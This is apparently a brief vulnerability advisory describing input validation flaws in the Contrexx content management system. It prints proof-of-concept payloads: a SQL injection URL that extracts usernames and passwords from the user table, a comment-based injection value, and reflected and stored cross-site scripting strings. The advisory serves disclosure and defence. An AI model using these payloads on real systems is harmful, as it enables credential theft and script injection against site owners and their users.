|
Contrexx Multiple Input Validation Vulnerabilities
An exploit is not required. The following proof of concept examples are available: supply the 'votingoption' parameter as value="1 /*!50030%20s*/" and submit the form. /index.php?section=gallery&cmd=showCat&cid=41&pId=1%20/**/UNION/**/%20/**/SELECT/**/%201,1,CONCAT(username,'-',password),1,1,1%20/**/FROM%20contrexx_access_users /index.php?section=search&term=%22%3E%3Cscr\ipt%3Ealert(%22xss%22)%3C/sc\ript%3E Create a blog entry with the title <script>alert('xss')</script> |
|
|
Privacy Statement |
